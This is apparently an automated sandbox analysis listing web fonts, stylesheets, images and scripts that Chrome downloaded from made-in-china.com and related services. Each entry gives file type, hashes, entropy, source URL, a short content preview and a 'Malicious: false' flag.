                                                                                                          Preview:wOF2......L(.......0..K.........................?FFTM..<.......`..j.D..e........|..X..6.$..*. ..S..g..5....... ..f....7....h...F!.%.....K.c.`...@t.:t.\e........U..@..k....l:..-g.P:.5=p.7^...9c~..-.K.y.dG.+9).3...+xo.b..C_..3.."Cd.x.JKD8..3;.....r.H.f...}.......fv...j.h.*m....On.....R..d..T..R=.G..(..d.H.xDT...!.J`. ....R.}.k.....o.E$NT,..B.....3..-.....;q]"...*>M.J.G...iR&..5......._i..F3...c{.........H..`A .nB...t....._.V%t..DC..B&...X...f..$..@q.Vq.y../.E........W. ..p)E..JN..aI[..&S^.P..dg......:R.Z.Z.$..Gi...e.......+.\...-c.m........W...d....d.9..kw...X.).pE........S...Ev.o........./././.....v\:...g.>..(.2N..+.%..e.a.<L]g.a.:..j..U.{f..,.G...z...V....+.+H`f..T.H ..6.....=#...r_p..`_......v..}.'=.v..|.v..Z.g~."`=.....~.g?....c.c..Q.)<...Mn..........&...<h.r.G.......C....%J.>\I......R.+......9...H.....`. @....f........X.;.h.?j?.B..u..e0..$...s.a'...;.1.....|.@..`...%......M..5$$.l......C..g.x.r.'^.~%..7f..q..l..l...l)_.R.u.4g..h...;Fc=.s'o...
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Web Open Font Format (Version 2), CFF, length 30260, version 1.0
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):30260
                                                                                                          Entropy (8bit):7.989930041250016
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:A6A107781A2437A6B4C3E02C77422779
                                                                                                          SHA1:319EB1662D1ED58E0ADD162BEEEA1EAE3FDAE333
                                                                                                          SHA-256:96629D71F53E1BD8C19F91C12AA54E58FD46A8159C2827E19D13EEEBD76CA278
                                                                                                          SHA-512:3EDFF0A3FECA6679987DDCDF9A7736099BBCC976B78BCC1C2D9C39BEFA0400B68C9187F254702B34E384C98CD8E394EA472861F7EC5031C64503517E0E940113
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://use.typekit.net/af/de4bea/00000000000000007735c4bc/30/l?subset_id=2&fvd=n5&v=3
                                                                                                          Preview:wOF2OTTO..v4.......h..u............................@?DYNA.(.p?GDYN.A...r.`..8.6.$..>...... .......^<DT.z.Q...PU.KB..j...O...._......G.0.~u_.N*Y.~/..A.y{4}..pj.dg...t>.F..9%..)9a.J..M..(6'i\r."....0..6...4...ONQ......F.......A(............y...+.x.#...8nY..[...3.3.1..1..b...a......&vI...,9(!.1........O/.............pm.\.?69......q\:...\i..*!.~(.F...$.....Aw.S...q.N.)..d....[.B...F~<ML....krk..[\..]i..P<.tM)l.pND7.yc.7.+....D.5{W_D=..../.......Y..8?.....+..bHE....'_..v=..g......:...,.$.......D.......]..:i.S.......\.....|....0.....+..9y..RP:t.},.........#rR.....s;...aF...C..c..8......t.7..@..t........}..6....U...4.....j.K..u.u!.CC..V..4E..=d.E..u...a.....l..@.4..S...U...O.....i;.[...*...?*..>...e.^......._...BT.^........VmQE..4....)...h!.DrlX`...z>.u.:...046*\4.]..G$F....9-..i.:u..A-JT....05=<*8Z......S.CB...U...E.yK...3....._....E.8#.hKuC....`T5j.=.t.6'.....m.....eM....Q...f.....Nw....pF;.......9o.!4.....Cg...`1,...!.r..v.9....1|.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1347045
                                                                                                          Entropy (8bit):4.89944418442153
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:AE52BF3F0B743F15DE7C031E5D48381D
                                                                                                          SHA1:730BF24020E1F2A56C7EA2EF374290762E7061DA
                                                                                                          SHA-256:CF3CDC6B7D4FDBA8CF8FC70264686258E0193B182787773774DCCD615FA76242
                                                                                                          SHA-512:E35F603B7819F79B9FA83EC6AA23C292AEA04FFD78FC19D7E54CD0028A7848CB70C341700CE1E8200AF7111585D986D717043F2851023301FA044D4BE3DABB2A
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://static1.squarespace.com/static/versioned-site-css/66fc2125bd1193293900133a/8/5c5a519771c10ba3470d8101/66fc2125bd1193293900135b/1567/site.css
                                                                                                          Preview::root{--white-hsl:0,0%,100%;--black-hsl:0,0%,0%;--safeLightAccent-hsl:62.15827338,80.34682081%,66.07843137%;--safeDarkAccent-hsl:0,0%,0%;--safeInverseAccent-hsl:0,0%,0%;--safeInverseLightAccent-hsl:0,0%,0%;--safeInverseDarkAccent-hsl:0,0%,100%;--accent-hsl:62.15827338,80.34682081%,66.07843137%;--lightAccent-hsl:204.375,25.3968254%,75.29411765%;--darkAccent-hsl:19.11504425,59.78835979%,37.05882353%}[data-section-theme="white"]{--course-item-nav-text-color:hsla(var(--black-hsl),1);--tweak-blog-item-pagination-icon-color:hsla(var(--black-hsl),1);--tweak-summary-block-read-more-color-on-background:hsla(var(--black-hsl),1);--tweak-quote-block-source-color-on-background:hsla(var(--black-hsl),1);--paragraphSmallColor:hsla(var(--black-hsl),1);--list-section-simple-button-background-color:hsla(var(--safeDarkAccent-hsl),1);--gradientHeaderBorderColor:hsla(var(--black-hsl),1);--tweak-summary-block-header-text-color-on-background:hsla(var(--black-hsl),1);--tweak-blog-alternating-side-by-side-list-
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 230 x 260, 8-bit/color RGBA, non-interlaced
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):8809
                                                                                                          Entropy (8bit):7.913468886529356
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:A84F4C7437A401641E035C6E4BE7563A
                                                                                                          SHA1:80623AEBE5CC7FF887755525FB668E27190E399D
                                                                                                          SHA-256:239F8FB526BB18C98F21EC2C54741ECD155C47B542784E932F7932DA89D5CCF8
                                                                                                          SHA-512:BB9637170F12F3D3AC260EE231A220496515874376AB4A2A45F890C6A45DC3DF355C3B22A1EDA09B779BCB99DF6B0297D1D8EA33A244728696C4A24B3CD578AE
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.micstatic.com/mic-search/img/home-2019/alert-brands_3b201fb1.png?v=1
                                                                                                          Preview:.PNG........IHDR.............<.H.....tEXtSoftware.Adobe ImageReadyq.e<..".IDATx.....U..O?.$J.... b.Q.#*fTD0+..1a....PG@..0...0*..p....c...`V.%..(......n.t........V..}V.}..U......!....W ..)..0..0........B...v.....OF..UU.>..D..f.=d6...V\\,a.....n3;-.....f..-T(+D...l.E.....f..~4;.....$L!r.%..l...fo..fv..sf..v..M.&..E.*a.Q...9.l.......f..}.~.f+..6{....N#D.....f.Z6le.B....c.!.1E....8..k.Qy{&R.S..D..B....R...F}...u.\.j..$...p.x>.^.....S...'...wu..>C,.YAJ.l.Y..pm..z.V...+x.MC..n%a..TR..q.Dz.B....j.b....|..<...~...pkW..c.sQ1....0s."..h....u..Z.U.0.........W...v2{.!6..P......z.j......zJ.$..3$...prdB_.........;r..o...c..H`(.!.Mfd........9.9..$x...2;.../...~.wz:ox(.GA...f...7.q.'-.7.F...C.y....u.(....FR..s.I.*..g.z.I.......9......4E..'.Z..'..1..=.<R;z.B.......n.XW..=.s.>S.+}V...So._.....F9.....V.9/n....P.m.s^...U..g...8.S.4.......W...|H.zN^.s\X.....>..a0.....0...E...2.gz0.S/.m...,...B......=f|...$..dRS/d..V.>.[.;F/.ec.........G........<....p.,.5M.....=c.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 50x50, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4053
                                                                                                          Entropy (8bit):7.786938341820593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:2CB3AEA7A6418DC73E136DF4FED2765D
                                                                                                          SHA1:4E61A97A995ECAF0223B59A46BE19E8286B28402
                                                                                                          SHA-256:2CFF74F4C249114F00181C24F04419EC181F2CAD8EC024341B11B507350F8438
                                                                                                          SHA-512:14814D40497F2E0C3624F9A57B33BECA334F806108AE43F68E6EA4D763F7858172187BBC2D09C57D6DAFAA3F978F01ACF460471140AABBF52EB82E20995A1CB4
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:......JFIF.....H.H.....C....................................................................C.......................................................................2.2...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(...q....K.E}g&.o..=.w0..0..Ye.W3G.1..:*. ..\T....6.]K....a..#.O.Bx..f.Z.X..NNQQ.....$......&T+G.RN......].B..$..w.d...].!@....P...?h?.."..5..)..>..>...Hk.cC./~.i.v.7^.o.xj.Q.............hWm..ew*......9.q<9.....(P.*B.f...Y....`........F.,.p..[.,..NX....{.7...n.|...O.[.B.,-Z..:..&.U...%....F..f.......NR...)~U.>......|=..B...x{.......O.x..X.W..........>..d...
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 990x400, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):32040
                                                                                                          Entropy (8bit):7.993268023960359
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:
                                                                                                          MD5:448CB47E59850BCCEE16520E2A12E71C
                                                                                                          SHA1:CD7BB710607F124EA031A2CEA4F5705BBDB60102
                                                                                                          SHA-256:0DDAABCB4E5E65CD65CD36EA1C577FAF4CD8200496CCA19C61D4970A5521E1D5
                                                                                                          SHA-512:3B67DC251F3CCAC38D3D7EF28A61DBE918CC2C63578939F0A66FD7364B771AA0A6030797AD9F4BB6EF230FDAF75479C789BB419E67E0119E56B164CC07957311
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://image.made-in-china.com/151f0j10KUYGEeZdHfWM/banner990X400-1727593343000.webp
                                                                                                          Preview:RIFF }..WEBPVP8 .}.......*....>.B.I.$)!'T.. ..bn......I...o..<.?.........:2..........!...g......4.g.....c....w~.u.?>...-...S.......>..?........._.......t}......g.+.....?w.._..........%.....O^.f..........y.x..|..Q..............p.........c.?.?...............s...O..;S_..7.w..m_....Q.?........?....n.....Q.....>.}..s.c.<...........I._...._..O........<.Hv]{......c`.......P.L...T.3...;...c`.!.u.l.V..X..4..5.~.Y......v...Y.-E..,...z.WL....}..E.S.u.l.W..kre..>b...>.......N.u....p....A..........u....j4K...Z.k0...r.)..yZ...6.+R..^...]P..'9.z .x.......J.0J[......E.$).ln.8.=8~..QE..b1Q...@4...=.y..H..,..y.........*.r...4&.N..w.I.|.....j.-V.._:..O.*....r.....z...W.....^R-qY.7.0.x. .......e..yZ...6.#x........i.-...mNt..j..MP.)@+P...>1y+...o.@j:.e...li.............R..;a\.q.....Z?....vn..b..J.{{./c..u.W..G...M!^.W...C.I.P.....o...4...tA5I(.I,Y.......T.t........s.c.<C.t.....1N..&,T.s..aY...M..@g.bu.0~Y.5.<.f.I..`.!.*gn6...|n..U.U.q.e.B....66......
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (46404)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):405871
                                                                                                          Entropy (8bit):5.59455045787152
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:4012402F362F3C94B05F1A4930669039
                                                                                                          SHA1:B5191E8B894422E302B0F548CA819D9455307838
                                                                                                          SHA-256:FCD7E7C5A8458937DB52028AAB42142782439D063DF7F2597677DFE888BDE2A2
                                                                                                          SHA-512:B67F484CAD0DAAA87F247EEF4798B2A4EEAED9467A1B7D8DE4B84AEA75EA6F363C1198E60B3FC7928AA84993D6EFBFE7A2512F095DCBCD9BA5DBE31C1C70CF2B
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.googletagmanager.com/gtm.js?id=GTM-T39J99&r=1727402485614
                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"165",. . "macros":[{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"products.0.productSku"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"products.0.productBrand"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"products.0.productType"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"orderid"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"crto.products"},{"function":"__jsm","vtp_javascript":["template","(function(){for(var b=",["escape",["macro",5],8,16],",c=[],a=0;a\u003Cb.length\u0026\u00263\u003Ea;a++)\"object\"==typeof b[a]?b[a].hasOwnProperty(\"id\")\u0026\u0026c.push(b[a].id):(
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (46404)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):405844
                                                                                                          Entropy (8bit):5.594433096853508
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:B3CB5DE5F4EAFF1BAF837A103B4E8928
                                                                                                          SHA1:0531DCF094D99761055A20EF6B5FD7EE594953DF
                                                                                                          SHA-256:A2303E8B744CFEB5949CDB38D084D64C51BE8A0C205715E25899DEA27C5E002F
                                                                                                          SHA-512:A3F383AACC3CD82055A0F2B6A0769B640A68CE742743972D302F1E9683B4E5E98099060B92E5C1F04014A6794D59C112EB389486796DAD87375C77CC7B145A76
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"165",. . "macros":[{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"products.0.productSku"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"products.0.productBrand"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"products.0.productType"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"orderid"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"crto.products"},{"function":"__jsm","vtp_javascript":["template","(function(){for(var b=",["escape",["macro",5],8,16],",c=[],a=0;a\u003Cb.length\u0026\u00263\u003Ea;a++)\"object\"==typeof b[a]?b[a].hasOwnProperty(\"id\")\u0026\u0026c.push(b[a].id):(
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2022:01:05 13:18:13], baseline, precision 8, 50x50, components 3
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):21503
                                                                                                          Entropy (8bit):6.8529171091279375
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:B4455A7682765CBEB0A3E214D592E16D
                                                                                                          SHA1:D585B88A933664EE6580ED5C853008C380183DCF
                                                                                                          SHA-256:9141AC2F5C48E635547525219E7C59EE4C1F494FEEBC60D0004E2E6660E88B3D
                                                                                                          SHA-512:AC70206CFC92B6E5F9ACD5E3BFECD672BE3BF07862F112415FEB9798B53B66840ECA5B76812C967E5F0ABA8A6D8DFA6D86831663585D88682E902D1F7E5F5666
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://pic.made-in-china.com/61f54j00CRfGtEQIdUiz/Top-selling-Products-in-Machinery.jpg
                                                                                                          Preview:.....dExif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CS6 (Windows).2022:01:05 13:18:13..........................2...........2...........................................&.(.........................................H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch....
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Web Open Font Format (Version 2), CFF, length 28944, version 1.0
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):28944
                                                                                                          Entropy (8bit):7.990538746594895
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:
                                                                                                          MD5:8567F5679070DCF186E1B492967CD8D7
                                                                                                          SHA1:D106F7D66ABD6DBE8E1C4A98DA7080B13E778A5E
                                                                                                          SHA-256:49C78828B56A082D8485BB1BE73313BC618998D527AE6691C1CFF214BF402657
                                                                                                          SHA-512:72B260BC1E9B5FC68B57C1624BC7604BBB9AD665B876A7B9B97CE67885CC01DB235A8BDFDEA35B66F579338C3F3DCFE39FCA67A06F2947645AB4B99644BC0409
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://use.typekit.net/af/5d8142/00000000000000007735c4c0/30/l?subset_id=2&fvd=n7&v=3
                                                                                                          Preview:wOF2OTTO..q........P..p............................;?DYNA.(.p?GDYN.E...h.`..8.6.$..>...... .f.......@.<D..aD5..@UU=%.ym..../....._....!..?..o...KG.. ......6.;...m.'.n.o...U.l......(.*.ml&.I....5cE.....{....Z^J;.T..n.O.."....O.s.G.oJ..'.l.{9.%,..*.<..?..5..F.c.w.Q..+XZ...tiJ....(v.o........VS4.hJ=....O:...,....c.y..{\jzs.mnL.;.RL3..u....$@B.!.h..t.\z*).;u....yt3"...>.U..4I..j58f...%..p...s../m..X3.? .a....l.p..>vUug[]u.@.T..,...?.?W..H.-Hw.8c...3+...T...T..[3...a..+#..t...$D.K73u.....t.Kx.g.k..(..NJ....Z...i[..!C....m..........gi....@..........'.........K.Y...f8.E......b.....P.T....J..T..u......4.cJ..Ld.-...+.$v.3..g..N/.fZ.#n.-.h.\..3!.<.J..T.2.#.....%...V.....,c......>'$!..~...Md.F........^.....o..?...n.gV.gj..?.].9.~ww\......*"..oI9..T.R j".Q...E..F.Q.......\.....X.*.k......%....{.|.^.}.n......].....Q.*.#.S..D..<...*..XUO.......{......*MnX...........b.7...s.y..g5.ZZ.../..}.~k.s::/..8#N....#.8<.........G..R.. ..z...$..%r.<&_._Z..Mi3..=....>
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6518
                                                                                                          Entropy (8bit):2.951064365485467
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:AA78D04664D6B65058FF847EB8D2D821
                                                                                                          SHA1:ABBE5F24DAE7833B596BEAB1C431F58E1C1C95E0
                                                                                                          SHA-256:0D75FA1C9F78745B408F55992519C9BD64DFDD5C1B456C5F48B5DC7C43184A8A
                                                                                                          SHA-512:828D6F59938220694CF3A851157F0FFB2179DFED687DA2F15927C8F119852C8F4625356B05D56404AAC91E1846974DFEC459387AC353A513BAA4048BBAE5AA0C
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:............ .(...&... .... .(...N...(....... ..... .............................................UUU.TTTpVVV.>>>.;;;p===.............................fff.VVVPTTT.UUU.TTT.TTT.:::.:::.:::.;;;.===Pfff.........WWW/UUU.UUU.TTT.TTT.TTT.TTT.TTT.:::.:::.:::.:::.:::.;;;.:::.<<</TTT.TTT.TTT.TTT.TTT.TTT.TTT.TTT.:::.:::.:::.:::.:::.:::.:::.:::.TTT.TTT.TTT.TTT.TTT.TTT.TTT.TTT.:::.:::.:::.:::.:::.:::.:::.:::.TTT.TTT.TTT.TTT.TTT.TTT.TTT.TTT.:::.:::.:::.:::.:::.:::.:::.:::.TTT.TTT.TTT.TTT.TTT.TTT.TTT.TTT.:::.:::.:::.:::.:::.:::.:::.:::.TTT.TTT.TTT.TTT.TTT.TTT.TTT.TTT.:::.:::.:::.:::.:::.:::.:::.:::.TTT.TTT.TTT.TTT.TTT.TTT.TTT.TTT.:::.:::.:::.:::.:::.:::.:::.:::.TTT.TTT.TTT.TTT.TTT.TTT.TTT.TTT.:::.:::.:::.:::.:::.:::.:::.:::.TTT.TTT.TTT.TTT.TTT.WWW.ddd.qqq.lll.UUU.???.:::.:::.:::.:::.:::.TTT.TTT.UUU.___.mmm.www.xxx.xxx.xxx.xxx.www.eee.NNN.;;;.:::.:::.YYY.hhh.uuu.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.sss.]]].CCC.}}}/yyy.yyy.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.xxx.yyy.yyy.}}}/............{{{Oyyy.xxx.xx
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 50x50, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5899
                                                                                                          Entropy (8bit):7.8720135105915885
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:F4733E3EE1963E03ED813A8BAAA144F7
                                                                                                          SHA1:BEC9B67313B9AA740C48D5065131B7395511F517
                                                                                                          SHA-256:1C9618489AA1768205E068C8B3411AB21CCD0E6A1178B76889A0A5577204654D
                                                                                                          SHA-512:1876C6A98AB76B365387DCC6DE71316C8849BB93D3DEDE8998BC924B4D668D26764DBD62F7FE3CD6C70321EAE40DC419BA642EFEEB4F2232378DAB7933E1843D
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:......JFIF.....H.H.....C....................................................................C.......................................................................2.2...............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..>.fT..<W.9?...|..uvz\.1;3.VR1...u.....y..2vM..}w<......|;...Q.........5....NR....?..wo....C.<-.].........P.4,y.'..H.5.Y.zT#).i._YI/.n...,.V....:.n.E7..>..<.w.G..Z...1Uq...ZZ\.#p+o4.3..~T#....G3.,.$.sJWk.`..Mj.M.k.{%.y.......ja0...xF....z>.ai<.....u{.`.i..v...{m.[..>y.V#... .......*...g.v.E.X.^W......T.....TV...G..p.oJ..J.,T...V.eo8/{....M.....#c......<W.{
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (12482)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12577
                                                                                                          Entropy (8bit):5.272284519743159
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:E6902F6C87474DB09CC3A43097C0F835
                                                                                                          SHA1:D0C2CA58B3CC6E0C6AAC0BA1E600E9D75D32C692
                                                                                                          SHA-256:F2B3FEA853C47D11FC4E1A9130B345DF9AF50302FF0BF8E828611F435F140B3D
                                                                                                          SHA-512:01666DC6E5D234A5BB7A2881CE1BFAEC473D2D72B0E2DEF9F1FF83A41CB86ED71757AA669434C79F34D28C886529C474349AD696665076CA48CD5D00ECF645A5
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:void function(){var e="ontouchend"in window?"touchend":"click";var i=$(".J-header-mark");var a=$("html,body");var t="ontouchend"in window;function o(){$.each($(".J-cate-in-pc .J-first-cate-name"),function(e,i){var a=$(i).data("index");$(".J-cate-in-pad .J-first-cate-name[data-index="+a+"]").text($(i).text())})}function n(){$.each($(".J-cate-in-pc .J-second-cate-more"),function(e,i){var a=$(i).data("index");$(i).attr("href",$(".J-first-cate[data-index="+a+"]").attr("href"))})}n();var s=$(".J-cate-in-pc .cate-items,.J-cate-in-pc .cate-items ");var r=$(".J-cate-in-pc .cate-items .cate-item,.J-cate-in-pc .cate-items .cate-more");var c=$(".J-cate-in-pc .cate-items .cate-more");var l=$(".J-cate-in-pc .more-cate-list .list-items .item");var m=$(".J-cate-in-pad .cate-items .cate-item");var d=null;var h=null;var p=null;var f=30;var v=function e(i){$.each(i.find("img"),function(e,i){var a=$(i).data("src");var t=$(i).attr("src");if(a&&a!=t){$(i).attr("src",a)}})};var u=function e(i){var a=$(".J-p
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):651429
                                                                                                          Entropy (8bit):5.844228243807767
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:5AF41E7B4416873B171E4ACCB4B60B1D
                                                                                                          SHA1:2C8D91BDEE42AAC24EE4BFB80A59DA955FD99DC3
                                                                                                          SHA-256:0C0A365C16D896348DF4DE6DA13178A97B72C35CED08BF51C455D2886AD4BB25
                                                                                                          SHA-512:257607643028E04DF815F2CC33797575B6049EFB3029614E4B1BC3A3A2A101E242B324333AA79E4C632321FCE80C2AD071133F3826AF18631CD262B3DE5E85ED
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:(function() {var u1=Object.defineProperty,c1=Object.defineProperties;var l1=Object.getOwnPropertyDescriptors;var ai=Object.getOwnPropertySymbols;var m1=Object.prototype.hasOwnProperty,d1=Object.prototype.propertyIsEnumerable;var on=(m,l)=>(l=Symbol[m])?l:Symbol.for("Symbol."+m);var oi=(m,l,i)=>l in m?u1(m,l,{enumerable:!0,configurable:!0,writable:!0,value:i}):m[l]=i,Ln=(m,l)=>{for(var i in l||(l={}))m1.call(l,i)&&oi(m,i,l[i]);if(ai)for(var i of ai(l))d1.call(l,i)&&oi(m,i,l[i]);return m},ii=(m,l)=>c1(m,l1(l));var Nr=(m,l,i)=>new Promise((s,r)=>{var d=E=>{try{p(i.next(E))}catch(g){r(g)}},f=E=>{try{p(i.throw(E))}catch(g){r(g)}},p=E=>E.done?s(E.value):Promise.resolve(E.value).then(d,f);p((i=i.apply(m,l)).next())}),sn=function(m,l){this[0]=m,this[1]=l},si=(m,l,i)=>{var s=(f,p,E,g)=>{try{var y=i[f](p),b=(p=y.value)instanceof sn,A=y.done;Promise.resolve(b?p[0]:p).then(S=>b?s(f==="return"?f:"next",p[1]?{done:S.done,value:S.value}:S,E,g):E({value:S,done:A})).catch(S=>s("throw",S,E,g))}catch(S){
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 50x50, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2170
                                                                                                          Entropy (8bit):7.637293460049972
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:61DD65842D304FD522460375276FFEAD
                                                                                                          SHA1:7F9519FEEEF5DF2258C9E174FD1C73DDD91BDF05
                                                                                                          SHA-256:D2BEA0B18167DB542DBE084EF87FCC039A3900F69C92A744165F5AECDFF43B87
                                                                                                          SHA-512:A50028995F6F6EBAE66D9AFC202098975080D3FB5C08E5362BF5FE56C2CA5788F050F13FCF45AB1A32E0298E926A9BDCD8719522517E7FA450515BA9D11686C0
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:......Exif..II*.................Ducky.......U......Adobe.d.................................................................................................................................................2.2...........................................................................................!..1"....AQ2B%.......................!.1Aa.Q"...q.....R..............?...".....!.CH...".D4...;....+e...wH....D[..I..C..d'aLUN..T.... \c.q.ov...?.....^Lk>...>rCl.S..........N.......O..}........C.......m.Q.).J.^A.m...BL`#^;\..x.F........s................]..hT...U...".j<.....v._^..h.5........./<..P.9.5.j.p.G...._. .v.P3..~5/.T1K...... .u....w......q....&.... ..z..7..*%?.z..........C>..I9g.."V|...Z.......R..0.....s<I.....a*.*... Q..."..Q..b.....so.S....i).s6.....b.(".....!L../.......0wd.......l{..l!.....A..A..Y.w...U..v.A.q...i#..|...;h.~..t.v..Q..(Fv.}....%.d.=u.d..:X......KU..V..<I.M:Vn>..v.....7..........{ic.J.2.U%..i)..]..F..".j.fP.Ee...T:|....w..Km.)a......o.~.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (4036), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):4036
                                                                                                          Entropy (8bit):5.322915920941288
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
